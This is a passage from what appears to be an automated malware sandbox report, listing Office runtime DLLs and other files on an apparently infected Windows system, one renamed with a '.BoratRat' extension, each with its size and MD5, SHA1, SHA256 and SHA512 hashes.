                                                                            Filesize

                                                                            26KB

                                                                            MD5

                                                                            e35d8dc16da6a13dcede94c1ece3965f

                                                                            SHA1

                                                                            91b980d8d70dccab1382318ae2ad347f5c9104c9

                                                                            SHA256

                                                                            f2defe88ddaf2f784bfaecf473f12502a4020dcfd12d35212d90789f489ce85b

                                                                            SHA512

                                                                            58f3d99cfa23a35f65adab72932ad3e59923b253a1deed7db1d8f889f196d52b1461a4a6b968af27307840159dd09b34d03e4d2304d2b120474f4d90b7dd4e74

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-private-l1-1-0.dll

                                                                            Filesize

                                                                            69KB

                                                                            MD5

                                                                            9b4372688253d12b26dfddf4d0f177dd

                                                                            SHA1

                                                                            41f8b6699cc20582ba11d03a7bf19213eb4dffb9

                                                                            SHA256

                                                                            b0fdc733249a01b82ef3ae0dc5efbc21ea58c9445425047daef59294d663e248

                                                                            SHA512

                                                                            19ad249ab54807c7f409113ffa6c7ad6cfddc989e57b76699e072c4ae8b430da33856aafbcc084de3f4cc8d7b2cd109e55fbd930418caeae80dae39057012bde

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-process-l1-1-0.dll

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            caa1a1037126cfe39f529b88e7e946b1

                                                                            SHA1

                                                                            22bd24472237687c7bd645def734e95a27c23098

                                                                            SHA256

                                                                            0d71b6088457963be4dc7811e046880bef6973ed7905055a57b02931b0051649

                                                                            SHA512

                                                                            80871efa061a9cb1cffee94aa6c68c90bf2bc2ca4e838c29358925279ee46208b60e2ec37327bb185195f8f20ba748167ad36d73b2b57f38cebfffef689a551f

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-runtime-l1-1-0.dll

                                                                            Filesize

                                                                            22KB

                                                                            MD5

                                                                            bcb976775c72fc4210b665ce5a24ccd4

                                                                            SHA1

                                                                            a04a419756f5d612d7c8f4efea02b11796460611

                                                                            SHA256

                                                                            26db9ae9ec8c5824cf52ec23ce4a19ca364e1eba7af01bbf84669bba497f3dc3

                                                                            SHA512

                                                                            d30772629f7604efca2514311bb5d6e5e16cbf175e6c2403bc5209e6bb0db736f893331554aa7139d158550360a848fdd3b0aecd6c600f6b0647c82848f9b0de

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-stdio-l1-1-0.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            bd29e8e3f87aa3943dbfbe4434fb02f0

                                                                            SHA1

                                                                            e37356e2dcb2ee386a78e4e2a57f44518ece4177

                                                                            SHA256

                                                                            ef8e00bfab2a614f817f3a095ff9f6885c6627d9f8c564090c516f6dfe41fed1

                                                                            SHA512

                                                                            00c5237c443a9cd9949eb37a02710fc875a2d707484eaceec628fefbb0afae99fe8940a436cf0cbedd7c4bbc0bea05dd4ea77242d8fb317fe223a615089a0639

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-string-l1-1-0.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            7aaa0b61f9286f599fa89e4477617c77

                                                                            SHA1

                                                                            a0227ff00c861153dc56f85256b933528ab41611

                                                                            SHA256

                                                                            851b76ceea7bcc456509257b6d9418582f669482eb2bbccebbddc6eac36dcc62

                                                                            SHA512

                                                                            bdac8e4ab872d36350e330444cd81d2d924d74b73904b677a1c418702fa822e889121ace8fae5b0832da7c19fb83efe7c291f9acaf27c5421f84455b79d5a7e6

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-time-l1-1-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            ad7dd997399c01fef3512f53bfa03365

                                                                            SHA1

                                                                            fb28aa981375a33843b949b2d35e95077be634f2

                                                                            SHA256

                                                                            b27ace263543682a8f4cf3e197a70e9f72fe41f30ef8c2fd622268a7a2d7ed71

                                                                            SHA512

                                                                            98cda9dffc7245495e462fb909b587e37ea776b3eddbd6cc75aa8b4395ff7f80623b66953b2ec2e36fbeb316c6afe52fddbb342908881272dbbf726ae95195b9

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\api-ms-win-crt-utility-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            16378ce15b64cbe3b679ebe5df6fa654

                                                                            SHA1

                                                                            67ad1e257a3d5c27d2eb960638d84da613dbe1fb

                                                                            SHA256

                                                                            b94f15fe4f5458e812fa758e141ce7289e6170e5bf4e1e61932756c668629b86

                                                                            SHA512

                                                                            60bddd8a4f2a1bccd85ef16961e10aa7e1ca2e84ddd7b44e09d961bdb70ba1fa689dc19bec4c1ce0ef847c6c86feaa7932eb16d6a7d7465e07ca9bfca058dc5f

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\concrt140.dll

                                                                            Filesize

                                                                            324KB

                                                                            MD5

                                                                            c1b6d2ad5bfb8221c3923c7bae7b5589

                                                                            SHA1

                                                                            5b2810f96c363303e7b3877f4a3357f532906dda

                                                                            SHA256

                                                                            8e8f582b9b2488b2e634a73d845de7277c222088b999ebe483c2857f0e3e75fb

                                                                            SHA512

                                                                            7438b60821c0aa528333899bdb9c0aa500cad5c50dad15758ce01d1620a203faf8a435949208fb4ef7b3dfeb07152ee73fa66f8899037d7b15e35e4a8056b214

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\mfc140u.dll

                                                                            Filesize

                                                                            5.6MB

                                                                            MD5

                                                                            aede477b557ec1c0fc9f7a82a548242f

                                                                            SHA1

                                                                            19e9f21eb84f16711fcdaa893bd53e33e3c5c6ed

                                                                            SHA256

                                                                            c146526825375b0adfe75354d18391e93e760c657ee8020c535f1d6922e4a89b

                                                                            SHA512

                                                                            e7e54c5c19a1d6c3fa4de47a28e4455b41669cc5399d063b35af3d41d7fc5c5c6278153952b6d455be4e62d2d56cd2c323677130f3e669ed07691921e88b3afe

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp120.dll

                                                                            Filesize

                                                                            644KB

                                                                            MD5

                                                                            339070b0dac735546dde4f364cadced8

                                                                            SHA1

                                                                            bcbcb401f9939f3bcb3ead22e5136e3dd621e3a6

                                                                            SHA256

                                                                            1f17bff1d7b7a7615172db66e2fcaf85f437479a7c31e599d81fb647000c85c4

                                                                            SHA512

                                                                            ea7db94184d313a1efcbe89f867f8002228c2b367abde6718b95ae12c138902dc8be42c1910af82a746eeaecafaeb21cd08e62fc8485f6fd9afbbfd79300ab37

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcp140.dll

                                                                            Filesize

                                                                            613KB

                                                                            MD5

                                                                            5841ff1adb3d3b5d734b994cebc888a5

                                                                            SHA1

                                                                            1f1a7f915da2e63a26ab19b427af3f5d91ce8112

                                                                            SHA256

                                                                            6aca9012908543eb4653558887a79b095243ed5b4d94dae6eb0dbc1da1110805

                                                                            SHA512

                                                                            eb300d5dd1e8d72a77b9eaec167ad1b35a8aaaee2194e942bd283bc4516e292f0d8e986c0759a5e41feb8591872e333b29532685cc9226400877c822479f3172

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msvcr120.dll

                                                                            Filesize

                                                                            940KB

                                                                            MD5

                                                                            2ca3a080fab4bf7784c3fe7ce08da1f2

                                                                            SHA1

                                                                            8149e9b2e3680d14a25c6ee6e727e0a912372505

                                                                            SHA256

                                                                            4eeee3e13f59013dc4a8fce6f54c8cacdffc3d347f0c998efd1db334878e8f77

                                                                            SHA512

                                                                            7ac3f980e436e2ed69f15e9f14a4f226fce62c8c251c6ed76a0c10bfa93d9b2166a6f8dc062aa48d7d2afc1ee8173c11132e6fa8eeb37aa26b61905a7aa3b6ac

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vccorlib140.dll

                                                                            Filesize

                                                                            358KB

                                                                            MD5

                                                                            00ddfeafa86428f64f482ee81b12b4af

                                                                            SHA1

                                                                            3474fcfbfd65488913c52912235e671b0a27bfa6

                                                                            SHA256

                                                                            c5bf6f563fa0f108a232a1ce11c0a5bf441ca7abf14fb96185f6627babca0709

                                                                            SHA512

                                                                            96246ac4380d5f6a5b4af61a4329211b2fbff8bcbc79bdd8912a6480806713731ba1ecd36933bf940e9a75e9e32aa8cc527f455d63051361b588905c18f59b53

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\vcruntime140.dll

                                                                            Filesize

                                                                            83KB

                                                                            MD5

                                                                            fb7f6e24e5dbc7e22838136265c1a27d

                                                                            SHA1

                                                                            25f1eea2b3bd6021eb6bd60ccf9f1e554adedd9c

                                                                            SHA256

                                                                            f18624b5eaf5294e38e43018eed61cd1cc0c2259758c86d9e0158fa1ba0eda18

                                                                            SHA512

                                                                            a9641ebb2c7b42f8b67bc4b0963869c2bbb3728c250ea80aabc1a2fc5f9e7244bece98ef137571b71a64fc7432ee92e02d977e2b83a850d3e3466b73664f0bf7

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            1dec39c5adfda9dfa7e7d98fe2c9bc71

                                                                            SHA1

                                                                            cc1ca16d36cf5f23c5cd69bb3f4730f05814f602

                                                                            SHA256

                                                                            a597fad3dc0add34db2503991975b2e734bd8c12080d1af5119b5db7cdacc9a2

                                                                            SHA512

                                                                            63a57a5e543a041d21b536c543ea0c11aa646141e4423fe055f314e22801cc9e1176b494bcf221dedf3d6e3560d43d15eebde2bab0b551ee5f6c3df48177819e

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            71013d0511c2af41289992e6ab7e8072

                                                                            SHA1

                                                                            23bc4d5f0e61d402078b064d9d924a50abc9e623

                                                                            SHA256

                                                                            67e400ba678aaa793b3b139eea186269a6c0ed843bb0162fe56c4daa26169df1

                                                                            SHA512

                                                                            a4e35527fdeccd140239bce6acb0cba81af580f202ff1da277529188a1470adf5a264244de71e804ad08ef1026f5a666c6f9388f48b7e50cb430b3a5e79c5514

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            afd7c5f4f7869c2e02db6b88a4eba035

                                                                            SHA1

                                                                            9a881d528710b156690726d7a655d57bd760a1fb

                                                                            SHA256

                                                                            fae11f68f303f2f67a8634ed6904b879304119e81c349f88cf25bdfcd12dbbff

                                                                            SHA512

                                                                            e89adeefe0d1fb6f9a516f7fed29d9ec35ebe5b1b54c87e88a7e3b49ec757208b7af870db72c1378c684ad4919fb4850e7983ec820dbcf7408d22c78f6187cf0

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            cf803b4ec86a2ee10d6eb9dc5bd05a5f

                                                                            SHA1

                                                                            921d55b52251190032e8c09e165dbf5901f4f03b

                                                                            SHA256

                                                                            649efb6f8cf0083ba5ef60ac4fbda80b9ea68fd8d6ac95382d6a2c46b890b888

                                                                            SHA512

                                                                            6e61e31f4321b659d64e1b061d7efe097d99b968958b07b2c40662302e27e99d29a94b951c9627af4af98f8b423bd139ec78e8c93184a3eb19e5134e0d02eb8a

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            a8a44848a3ed939a510baf520db56133

                                                                            SHA1

                                                                            5cc33a46975e86b96f5c84dd520980806acb52a5

                                                                            SHA256

                                                                            4865b14c297ac5ffee739bac2c438576a4436309ae167a3c4a862609d648e266

                                                                            SHA512

                                                                            5ac9ad9db80a560e84355e67d683af8569ed5017cbe157e340b2888332e33dc90820917923be6578f35d2b6e04df11ba95348e2b0c8ba3da3d796ce39e3be1c3

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            bcad5d9a7024b7fcd2faa1abf783bca3

                                                                            SHA1

                                                                            66e41b3ce0be55db2aaa532c4b74b1ec46b38785

                                                                            SHA256

                                                                            aef0e5129e8773bb825590337909211f55a02959003fd6a512c32c86db7dc984

                                                                            SHA512

                                                                            7bde6991fba2cefde4f93d0c5c3ee9ad93bfc3ca891151efe84066d8f146e0938f64c6af5ba5e5506abbded8c7a79f9004d0eaf9dad9683e0b64b7e6046d4fb4

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dll

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            89ac8da153e5169d8029c8db7cc95143

                                                                            SHA1

                                                                            33b0053d00fc2be2385f76b8e45452348aa280a7

                                                                            SHA256

                                                                            3e1a1167687c2689e762996f41f3a0bc41f7aaea9e299f2d3a4839b363c65983

                                                                            SHA512

                                                                            6cc25b2782f65756ea9a57b686625d8bec25758daa330988395b8d853822e9710783ccd5ddde55d615c7fb02712c8ca8f4b6ef2162f42ead041962fe71c7d05c

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dll

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            8fdcb400daab836867f6af3e1aec161b

                                                                            SHA1

                                                                            4ad8ccf0dd80c1b6b39a272196bd3bf9c7c30081

                                                                            SHA256

                                                                            dd94e3a67517388f9a02b919345cbfad20f73b1e6a40d5d9c7fab659c564ff77

                                                                            SHA512

                                                                            6923c87869f62b8b58de1e59470348b59b911034e6d690f9be69db76f75fc5691b232f179dcc8db46e64c62b6f82f79488c37fcf12a58022e50432e952306b96

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dll

                                                                            Filesize

                                                                            22KB

                                                                            MD5

                                                                            9fb5bf5cb7e83c26d6486ebe1007abd9

                                                                            SHA1

                                                                            b6857e0defabbebd0c927009a3860bd793010d64

                                                                            SHA256

                                                                            7e25ee76e2bbcac034eb7a7a63a3df429e458835b592e196f3069111682ff8e6

                                                                            SHA512

                                                                            ee1f992ebba4bb2980332bbea470d5f47a4813b5aef01035180db87396c877606d54482440f6eece97d77236d4b9acfedad6dc8e39d8ab3ea73f93cc97263478

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-environment-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            e66ed9b3c8d2fe8009854dce1fb67d14

                                                                            SHA1

                                                                            7577b6bf95315f089a310af6a57e36733a8d4c9b

                                                                            SHA256

                                                                            43e4d190498781a78814b40834632add3abdbc0a67073c30910e9874246dce33

                                                                            SHA512

                                                                            36501ea728863e305929e55f276c20533a7536507351ff97eab7c53a5bc6b70f0d8dd06aa0c67d96f1ae7d88d8924e7f1f5cb65e7a7f32a829a52b060768e03c

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            81ad66c0b4525c166ca474fed1aee74a

                                                                            SHA1

                                                                            cb6f8a2f4307499d15c6b0421b8143d4d2a811e8

                                                                            SHA256

                                                                            f27de3672842302c1cda3d268a8ceaac6eee8b1c45cdf5028a4e9d715141710c

                                                                            SHA512

                                                                            36e9da7296631153c9b4b68e88d63f24575c12516a257be10127bf375d67f534811a02b9e1f7e63ffc1e290f073d508781d5ffcfb559d8981876c863de37a6af

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dll.BoratRat

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            7c025c27517bdc612ae60c8bb35cb7cc

                                                                            SHA1

                                                                            53815f9e818eedbd7321ed59604e930ea7209b43

                                                                            SHA256

                                                                            93cc10b88f78efe7d3de10e73aa375d8c3c0d4f320df530f7b544e4fb455a680

                                                                            SHA512

                                                                            30b5903fb97bf1ec8fff405316ab5715a9ad6b0ff559d37e214abfcf7ed8d298f20cab3406c492d07494c774db0ed63de2dda953d7e0392aa32aaa81d58cceeb

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            fa1f159104ab7793caf8ad9c9de41bdc

                                                                            SHA1

                                                                            6f5d736205001d19c7c7a267531b325164c2c3f9

                                                                            SHA256

                                                                            89798d09d303775ab9bb867f10956fed3a67c41c3a518c818dd5cfdf5c69c7cf

                                                                            SHA512

                                                                            c4bec5bc62acbf71d2b0d414f136607625623f731880c91c86dc8ce21586a027c8cba6572c18e7dbc8110a19394ac82a26610e78999640c76665fd94cc2cb172

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-math-l1-1-0.dll

                                                                            Filesize

                                                                            28KB

                                                                            MD5

                                                                            ef896825fec3cd1d754787b76ac7c232

                                                                            SHA1

                                                                            ea7da1f78dbe49b973f63920c4c90022796cdae2

                                                                            SHA256

                                                                            3a5882860030b83b9934dcbfb40c7245376c7145cb08c0a845b9c06cf9a7e728

                                                                            SHA512

                                                                            fd2fec0c40dc21fad098afe73d3a36d7031d00f42336a3ce175479da80cff9d3ea42a635005af1135a097566f686e2b6f04238a22fb67fe6914d313bd2e9f957

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dll

                                                                            Filesize

                                                                            26KB

                                                                            MD5

                                                                            1d60ed17184cf352b3f065b6b1f1506b

                                                                            SHA1

                                                                            b4410be372e0a2e48abb46a08f94843f70c5fed2

                                                                            SHA256

                                                                            4d99e051870df3cc5f1b33c406a8f6b353c44c9bcdd863be2cb39d24b2e88348

                                                                            SHA512

                                                                            4c9093873e9c67cef67e79b6f6c6b12e9ca5f4ec9f8f2a7a7cc392346bd094164da7d7b3b510840edb249d527164d9e719cb3ae542b1a9db7e28d68c8a0eeb3c

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-private-l1-1-0.dll

                                                                            Filesize

                                                                            71KB

                                                                            MD5

                                                                            6fffe57d0c3cdbb70e49c75acf9c54f7

                                                                            SHA1

                                                                            1d611e4668fa15b82ab6f740f7ac43787cbb83c4

                                                                            SHA256

                                                                            e59b80f9d0dfbea0e6df73baae3a0c3d441d3e1edd811fb8bbf0ad66d0dc1e9d

                                                                            SHA512

                                                                            b6e838c4f8fc658b5db3bb7786bd89da286ed20037503823ffdccab0cfaaf8da73c95dcca32f44dbdbbaad327aea1aad3df952793c12d9ae25a28e34a82487c3

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-process-l1-1-0.dll

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            4fc8685d592b8d28c215281021f7ba62

                                                                            SHA1

                                                                            b26196797d1dacb5a0b154405c5d6e95453d6a77

                                                                            SHA256

                                                                            60ee60a06e9a061f1a3c9d01bb3bf544923129bbdc32a27a61951dee063f0d0c

                                                                            SHA512

                                                                            0e2ebd7d36fa3beddde3f333d4d10dd64e1dc4ef962e9c85c3fa1c0673121817c2a5bac14c5207dea2e8c7a478af93f5d8c9dcaf9cab9830dd2f3145d595e29d

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-runtime-l1-1-0.dll

                                                                            Filesize

                                                                            22KB

                                                                            MD5

                                                                            dabf29579f799b7da929820e570777dc

                                                                            SHA1

                                                                            8d517556b80a2f1a210bc153466d10b4f4436c0e

                                                                            SHA256

                                                                            b23a182b109da7b27abb491d1c45de086d6a5dc7403db31454015072f8c0c6ad

                                                                            SHA512

                                                                            d264be09544f6f259fe3edad79fcb16f2dcfd50f1761135ce8bc37d267b307e5f8ce4ec0a979746774ff361971708e0afca1a733cf5cec7da56660c8219853da

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-stdio-l1-1-0.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            fda8452ec010a350fad2041f07fc03bc

                                                                            SHA1

                                                                            829849cd704c4917c15704d3c8fc218ce0ff1418

                                                                            SHA256

                                                                            cc2f1e79bb3e0d3e585a97501a3fdb8af2f04748fdcc6dfd50d46629577ea81e

                                                                            SHA512

                                                                            f6e603ad7c34c9cb67584655e843a50dab4ea7e99f3938d5e8d6f6b879e7fba4e898bafa8e73c7eaa471e2aa64a59ea7b40f9dad1c9f5dc9e6b90a1bf6ce33c3

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll

                                                                            Filesize

                                                                            24KB

                                                                            MD5

                                                                            f545d077e959436712c7278dc8871896

                                                                            SHA1

                                                                            7cab58f8b3390e3c401b8866705cbb5155834061

                                                                            SHA256

                                                                            eb3985f14fded950b03d6993b1c74a9c6de4aacdab25e1250a1c5f61b7f3869b

                                                                            SHA512

                                                                            6319af1a147323dccbe3694e77b2e84faf5cca19bc205c418fc1b0d32386cf60769f24005dcb1949a59c1c5e41aca5e63e6990312385990e8dec1b4ac688c171

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-time-l1-1-0.dll

                                                                            Filesize

                                                                            20KB

                                                                            MD5

                                                                            ce8ae2941d6e4236664bf3b72fdab5c0

                                                                            SHA1

                                                                            694e07ba17e16fe621cac884e85e4afc05450365

                                                                            SHA256

                                                                            c7c302b541ee4bf0c0807abd762b829a7ec428d1df6051d25dce8f245463bac1

                                                                            SHA512

                                                                            ec8d9ea5c05b39b490c21a42baf9e229da4d183565fcca9f9726b3219cad6183582f6331d97270b92bdc32b5c598e01fa90585dce34600fa4b3ec61b2686a5a9

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-utility-l1-1-0.dll

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            93983e003d6030b5ac79c9da5c340206

                                                                            SHA1

                                                                            8978adb85adf7aa851aca8ea287be581403b0162

                                                                            SHA256

                                                                            cb3387e8dd057c247f55a51e34d5ffd7347e3cf7963c669dc3142c2fecf8eb22

                                                                            SHA512

                                                                            99cc8c961ea325462f45b7304ff9ffb160cb724924c3c2805c9fcf44ba0b15c4d56ecf6726cb495a427c0fdbbe360456fa7e77e3c477497b4a14b3b2f000fe4f

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\concrt140.dll

                                                                            Filesize

                                                                            244KB

                                                                            MD5

                                                                            7d1c503f28512aefb380e837c61b1d3e

                                                                            SHA1

                                                                            48e0d9b3e76944d4247337db87d81301f70bf143

                                                                            SHA256

                                                                            4b5f5e1ac329519e08e0f3a9b154970592278228573510d85c853ce9d482c489

                                                                            SHA512

                                                                            4e94023b0519ba646a6fc4558508426f99d518ba98cec600421ab4e500f4d4ff4e361822c669530187d485a14f9352dd70799a470362ccba802d734c9b719960

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\mfc140u.dll

                                                                            Filesize

                                                                            4.8MB

                                                                            MD5

                                                                            c366e114f9e2bf94395b38ed744f1d67

                                                                            SHA1

                                                                            b8575db3ec016cc0264475daabf6c461146a789d

                                                                            SHA256

                                                                            581ec3d61632ddc53031f75dae2f59796800f2956deee12ff0e28a8f656d745b

                                                                            SHA512

                                                                            cdd5aea271331e549ee5c524b116897a89f0815ec055f2ba1478e1dca07af4855e8fc0955bfe6db98adf6e1d553d1bfcae0803893fa600c77dc99a49f1473f83

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp120.dll

                                                                            Filesize

                                                                            444KB

                                                                            MD5

                                                                            1b527f78edb44dda4ae42bdcaa2cec1e

                                                                            SHA1

                                                                            339afe868f375420fa3611db8614db0acb603111

                                                                            SHA256

                                                                            be93b467e655ef7740913fbd049c48aab7454ba1c04f22d670fec764d658a0e0

                                                                            SHA512

                                                                            0d9777b9ac3a068322a563c1cdcf40ee71480446963d3b19d91fec5164094d5841b7fbb7eae056bf94ead78448ad108fa23d02ca82671d180ca1199756ab0ed2

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcp140.dll

                                                                            Filesize

                                                                            439KB

                                                                            MD5

                                                                            81a05cad5e1b32490ce9433e272900d0

                                                                            SHA1

                                                                            b32617cf6c32f76d777a2d83766a28b42a34cfd7

                                                                            SHA256

                                                                            a0e6c6eeee5a8928a8ac6876028b4028f45ea001eb7907d2cdac2dffe5d6e29e

                                                                            SHA512

                                                                            cf05ae02f255573a6ec5b78c0097073c082c0bf9c6932b62209f59e139e228b1c69ed32b759bdbdca8445849b1e63166426d36c2265a69517b6fbcbc9927ff52

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\msvcr120.dll

                                                                            Filesize

                                                                            946KB

                                                                            MD5

                                                                            0079aa35213c0e144162270c78d5a391

                                                                            SHA1

                                                                            5c1662659f63b3553f6def3f315f03ae97f6627b

                                                                            SHA256

                                                                            a5b80b477424a64a02340083b559176115529e85aa3f53a6324e75abca8e20ba

                                                                            SHA512

                                                                            189e672ae3a2ba11e23064170715a67d4c50e64fb25ee600b8ec212413b9aa98c26df3085623aaa7d5b91e38ec197171a75bb367628cd22e97830893f61090e2

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ucrtbase.dll

                                                                            Filesize

                                                                            879KB

                                                                            MD5

                                                                            636d90f6a500a395ca650ffbea536770

                                                                            SHA1

                                                                            8fd8b7a27b4a84df35cb6c71f294791d8c136c35

                                                                            SHA256

                                                                            39b75091720ff7e9eb4bb845074bcffa5295a55e2f2c9827a15c24e79b44fe05

                                                                            SHA512

                                                                            c04d0e3af947598ed5c4a6c3788febb37d2b256ef3f0117664111db3f6952eac80949355ca1fd78c794b7e594d04b3a7541b3c323c45b71b21b316068aacbafe

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vccorlib140.dll

                                                                            Filesize

                                                                            263KB

                                                                            MD5

                                                                            655eb892a215f8302a67fabf9188f0fc

                                                                            SHA1

                                                                            a81c6987e33c7ed1699bc5ac2386e6d12b2b7f92

                                                                            SHA256

                                                                            c615adbf8b794d479bcb7a342bac62ccd3a52bb82376cce550a1883414c6e949

                                                                            SHA512

                                                                            8f48134de52571d68b775ca0be770cb44981ed0fe2eb4f6420d193edfa54babafcc57ac31ac93c207ef9073703165409fda32c9c5fcbff1d4df7278b99842090

                                                                          • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vcruntime140.dll

                                                                            Filesize

                                                                            79KB

                                                                            MD5

                                                                            fa6c0bce57f12e412f4b05bc378cfa8d

                                                                            SHA1

                                                                            7b3fd7a72555e69b6750da67ccfde5b1b7a1616f

                                                                            SHA256

                                                                            2af06f6ad2591e3610637842ce8f98f78a027682ea7b30242ed8e362fac6f714

                                                                            SHA512

                                                                            2a5b11676aa693d40971508225161020e6e90cb661af2c291801c9d9c228635db085385f8a6be73400581abf006072185f6dca00a6111e19873e3279f4c1b969

                                                                          • C:\Program Files\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-1000-0000000FF1CE}\misc.exe

                                                                            Filesize

                                                                            1014KB

                                                                            MD5

                                                                            39bdfba28edb9e4b6d576bb67e99bb8d

                                                                            SHA1

                                                                            4347f39fc1e7d4a7059c387b5cd80e23db3d7635

                                                                            SHA256

                                                                            e524c3572fd9f72c7cb76d479b6aee9fd73afa9cf353f112e1a224c6be09cc87

                                                                            SHA512

                                                                            b339a6ecba8a377a6ba41a53ec229caad196bbdede739dedbe98874a7d22da9cd479082225c85bc9897a6271cb9a9b935b79e594fdfa818ace61140488141af8

                                                                          • C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo

                                                                            Filesize

                                                                            584KB

                                                                            MD5

                                                                            fac56cd557db9c6416ce5f79c1929ea8

                                                                            SHA1

